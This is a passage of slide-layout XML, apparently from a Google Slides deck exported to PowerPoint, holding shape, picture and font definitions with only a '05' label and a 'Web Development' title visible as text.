              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;p56"/>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05</a:t>
            </a:r>
            <a:endParaRPr sz="12800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p56"/>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56"/>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56"/>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14" name="Google Shape;514;p56"/>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marR="0" lvl="0" algn="r"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15" name="Google Shape;515;p56"/>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16" name="Google Shape;516;p56"/>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marR="0" lvl="0" algn="r"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17" name="Google Shape;517;p56"/>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18"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="Google Shape;519;p57"/>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5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21" name="Google Shape;521;p5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522" name="Google Shape;522;p57"/>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523" name="Google Shape;523;p5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24" name="Google Shape;524;p57"/>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525" name="Google Shape;525;p5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26" name="Google Shape;526;p57"/>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27" name="Google Shape;527;p57"/>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57"/>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57"/>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57"/>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31" name="Google Shape;531;p57"/>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32" name="Google Shape;532;p57"/>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533" name="Google Shape;533;p57"/>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4" name="Google Shape;534;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="535" name="Google Shape;535;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152516" y="10444195"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="536" name="Google Shape;536;p57"/>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41"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;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3" name="Google Shape;43;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44" name="Google Shape;44;p31"/>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45" name="Google Shape;45;p3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46" name="Google Shape;46;p31"/>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47" name="Google Shape;47;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48" name="Google Shape;48;p31"/>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37"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538" name="Google Shape;538;p58"/>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5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40" name="Google Shape;540;p5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541" name="Google Shape;541;p58"/>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542" name="Google Shape;542;p5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43" name="Google Shape;543;p58"/>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544" name="Google Shape;544;p5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45" name="Google Shape;545;p58"/>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46" name="Google Shape;546;p58"/>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58"/>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58"/>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58"/>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50" name="Google Shape;550;p58"/>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51" name="Google Shape;551;p58"/>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552" name="Google Shape;552;p58"/>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3" name="Google Shape;553;p58"/>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4" name="Google Shape;554;p58"/>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5" name="Google Shape;555;p58"/>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56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557;p59"/>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5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59" name="Google Shape;559;p5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560" name="Google Shape;560;p59"/>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561" name="Google Shape;561;p5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62" name="Google Shape;562;p59"/>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563" name="Google Shape;563;p5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64" name="Google Shape;564;p59"/>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65" name="Google Shape;565;p59"/>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59"/>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59"/>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59"/>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69" name="Google Shape;569;p59"/>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70" name="Google Shape;570;p59"/>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571" name="Google Shape;571;p59"/>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72" name="Google Shape;572;p59"/>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3" name="Google Shape;573;p59"/>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4" name="Google Shape;574;p59"/>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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576;p6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6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78" name="Google Shape;578;p6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579" name="Google Shape;579;p60"/>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580" name="Google Shape;580;p6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581" name="Google Shape;581;p60"/>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582" name="Google Shape;582;p6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83" name="Google Shape;583;p6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84" name="Google Shape;584;p6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6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6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6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88" name="Google Shape;588;p6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89" name="Google Shape;589;p6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590" name="Google Shape;590;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3740828"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="591" name="Google Shape;591;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5938928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="592" name="Google Shape;592;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8149861"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="593" name="Google Shape;593;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Google Shape;595;p6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6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97" name="Google Shape;597;p6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598" name="Google Shape;598;p61"/>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599" name="Google Shape;599;p6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600" name="Google Shape;600;p61"/>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601" name="Google Shape;601;p6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02" name="Google Shape;602;p61"/>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03" name="Google Shape;603;p6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6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6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61"/>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07" name="Google Shape;607;p61"/>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08" name="Google Shape;608;p61"/>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09" name="Google Shape;609;p6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1"/>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611" name="Google Shape;611;p61"/>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2" name="Google Shape;612;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="613" name="Google Shape;613;p61"/>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4" name="Google Shape;614;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="615" name="Google Shape;615;p61"/>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16"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p62"/>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6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19" name="Google Shape;619;p6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620" name="Google Shape;620;p62"/>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621" name="Google Shape;621;p6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622" name="Google Shape;622;p62"/>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623" name="Google Shape;623;p6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24" name="Google Shape;624;p62"/>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25" name="Google Shape;625;p62"/>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62"/>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62"/>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62"/>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29" name="Google Shape;629;p62"/>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30" name="Google Shape;630;p62"/>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31" name="Google Shape;631;p62"/>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62"/>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633" name="Google Shape;633;p62"/>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4" name="Google Shape;634;p62"/>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5" name="Google Shape;635;p62"/>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36" name="Google Shape;636;p62"/>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37" name="Google Shape;637;p62"/>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38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="639" name="Google Shape;639;p63"/>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6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41" name="Google Shape;641;p6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642" name="Google Shape;642;p63"/>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643" name="Google Shape;643;p6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644" name="Google Shape;644;p63"/>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645" name="Google Shape;645;p6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46" name="Google Shape;646;p63"/>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47" name="Google Shape;647;p63"/>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63"/>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63"/>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63"/>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51" name="Google Shape;651;p63"/>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52" name="Google Shape;652;p63"/>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53" name="Google Shape;653;p63"/>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63"/>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655" name="Google Shape;655;p63"/>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56" name="Google Shape;656;p63"/>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57" name="Google Shape;657;p63"/>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58" name="Google Shape;658;p63"/>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59" name="Google Shape;659;p63"/>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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p6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6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63" name="Google Shape;663;p6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664" name="Google Shape;664;p64"/>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665" name="Google Shape;665;p6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666" name="Google Shape;666;p64"/>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667" name="Google Shape;667;p6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68" name="Google Shape;668;p6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69" name="Google Shape;669;p6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6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6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6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73" name="Google Shape;673;p6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74" name="Google Shape;674;p6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75" name="Google Shape;675;p6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6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677" name="Google Shape;677;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3504095"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="678" name="Google Shape;678;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="679" name="Google Shape;679;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7203328"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="680" name="Google Shape;680;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="681" name="Google Shape;681;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="683" name="Google Shape;683;p65"/>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6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85" name="Google Shape;685;p6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686" name="Google Shape;686;p65"/>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687" name="Google Shape;687;p6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688" name="Google Shape;688;p65"/>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689" name="Google Shape;689;p6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90" name="Google Shape;690;p65"/>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91" name="Google Shape;691;p65"/>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65"/>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65"/>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65"/>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65"/>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65"/>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97" name="Google Shape;697;p65"/>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98" name="Google Shape;698;p65"/>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99" name="Google Shape;699;p65"/>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00" name="Google Shape;700;p65"/>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701" name="Google Shape;701;p65"/>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2" name="Google Shape;702;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4930259"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="703" name="Google Shape;703;p65"/>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4" name="Google Shape;704;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8109292"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="705" name="Google Shape;705;p65"/>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06" name="Google Shape;706;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>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07"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p66"/>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6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10" name="Google Shape;710;p6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711" name="Google Shape;711;p66"/>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712" name="Google Shape;712;p6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713" name="Google Shape;713;p66"/>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714" name="Google Shape;714;p6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15" name="Google Shape;715;p66"/>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16" name="Google Shape;716;p66"/>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66"/>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66"/>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66"/>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66"/>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66"/>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22" name="Google Shape;722;p66"/>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23" name="Google Shape;723;p66"/>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24" name="Google Shape;724;p66"/>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25" name="Google Shape;725;p66"/>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726" name="Google Shape;726;p66"/>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27" name="Google Shape;727;p66"/>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28" name="Google Shape;728;p66"/>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29" name="Google Shape;729;p66"/>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30" name="Google Shape;730;p66"/>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31" name="Google Shape;731;p66"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Google Shape;733;p67"/>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6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35" name="Google Shape;735;p6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736" name="Google Shape;736;p67"/>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737" name="Google Shape;737;p6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738" name="Google Shape;738;p67"/>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739" name="Google Shape;739;p6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40" name="Google Shape;740;p67"/>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41" name="Google Shape;741;p67"/>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67"/>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67"/>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67"/>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67"/>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67"/>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47" name="Google Shape;747;p67"/>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48" name="Google Shape;748;p67"/>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49" name="Google Shape;749;p67"/>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50" name="Google Shape;750;p67"/>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751" name="Google Shape;751;p67"/>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52" name="Google Shape;752;p67"/>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53" name="Google Shape;753;p67"/>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54" name="Google Shape;754;p67"/>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55" name="Google Shape;755;p67"/>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56" name="Google Shape;756;p67"/>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49"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Google Shape;50;p32"/>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51" name="Google Shape;51;p32"/>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32"/>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
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;53;p32"/>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Web Development</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p32"/>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55" name="Google Shape;55;p32"/>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6" name="Google Shape;56;p32"/>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57" name="Google Shape;57;p32"/>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58" name="Google Shape;58;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2069089" y="3283233"/>
            <a:ext cx="6094420" cy="454033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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758" name="Google Shape;758;p6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6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60" name="Google Shape;760;p6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761" name="Google Shape;761;p68"/>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762" name="Google Shape;762;p6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763" name="Google Shape;763;p68"/>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764" name="Google Shape;764;p6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65" name="Google Shape;765;p6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66" name="Google Shape;766;p6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6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6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6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6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6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72" name="Google Shape;772;p6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73" name="Google Shape;773;p6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74" name="Google Shape;774;p6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75" name="Google Shape;775;p6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776" name="Google Shape;776;p68"/>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77" name="Google Shape;777;p68"/>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78" name="Google Shape;778;p68"/>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79" name="Google Shape;779;p68"/>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80" name="Google Shape;780;p68"/>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81" name="Google Shape;781;p68"/>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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Google Shape;783;p69"/>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6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85" name="Google Shape;785;p6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786" name="Google Shape;786;p69"/>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787" name="Google Shape;787;p6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788" name="Google Shape;788;p69"/>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789" name="Google Shape;789;p6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90" name="Google Shape;790;p69"/>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91" name="Google Shape;791;p69"/>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69"/>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93" name="Google Shape;793;p69"/>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69"/>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95" name="Google Shape;795;p69"/>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69"/>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97" name="Google Shape;797;p69"/>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69"/>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99" name="Google Shape;799;p69"/>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69"/>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01" name="Google Shape;801;p69"/>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69"/>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803" name="Google Shape;803;p69"/>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4" name="Google Shape;804;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="805" name="Google Shape;805;p69"/>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06" name="Google Shape;806;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Google Shape;807;p69"/>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08" name="Google Shape;808;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1389"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="809" name="Google Shape;809;p69"/>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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="Google Shape;811;p70"/>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7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13" name="Google Shape;813;p7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814" name="Google Shape;814;p70"/>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815" name="Google Shape;815;p7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816" name="Google Shape;816;p70"/>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817" name="Google Shape;817;p7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18" name="Google Shape;818;p70"/>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19" name="Google Shape;819;p70"/>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70"/>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21" name="Google Shape;821;p70"/>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70"/>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23" name="Google Shape;823;p70"/>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70"/>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25" name="Google Shape;825;p70"/>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70"/>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27" name="Google Shape;827;p70"/>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70"/>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29" name="Google Shape;829;p70"/>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70"/>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831" name="Google Shape;831;p70"/>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32" name="Google Shape;832;p70"/>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33" name="Google Shape;833;p70"/>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34" name="Google Shape;834;p70"/>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35" name="Google Shape;835;p70"/>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36" name="Google Shape;836;p70"/>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37" name="Google Shape;837;p70"/>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38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;p71"/>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7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41" name="Google Shape;841;p7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842" name="Google Shape;842;p71"/>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843" name="Google Shape;843;p7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844" name="Google Shape;844;p71"/>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845" name="Google Shape;845;p7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46" name="Google Shape;846;p71"/>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47" name="Google Shape;847;p71"/>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71"/>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49" name="Google Shape;849;p71"/>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71"/>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51" name="Google Shape;851;p71"/>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71"/>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53" name="Google Shape;853;p71"/>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71"/>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55" name="Google Shape;855;p71"/>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71"/>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57" name="Google Shape;857;p71"/>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71"/>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859" name="Google Shape;859;p71"/>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60" name="Google Shape;860;p71"/>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61" name="Google Shape;861;p71"/>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62" name="Google Shape;862;p71"/>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63" name="Google Shape;863;p71"/>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64" name="Google Shape;864;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
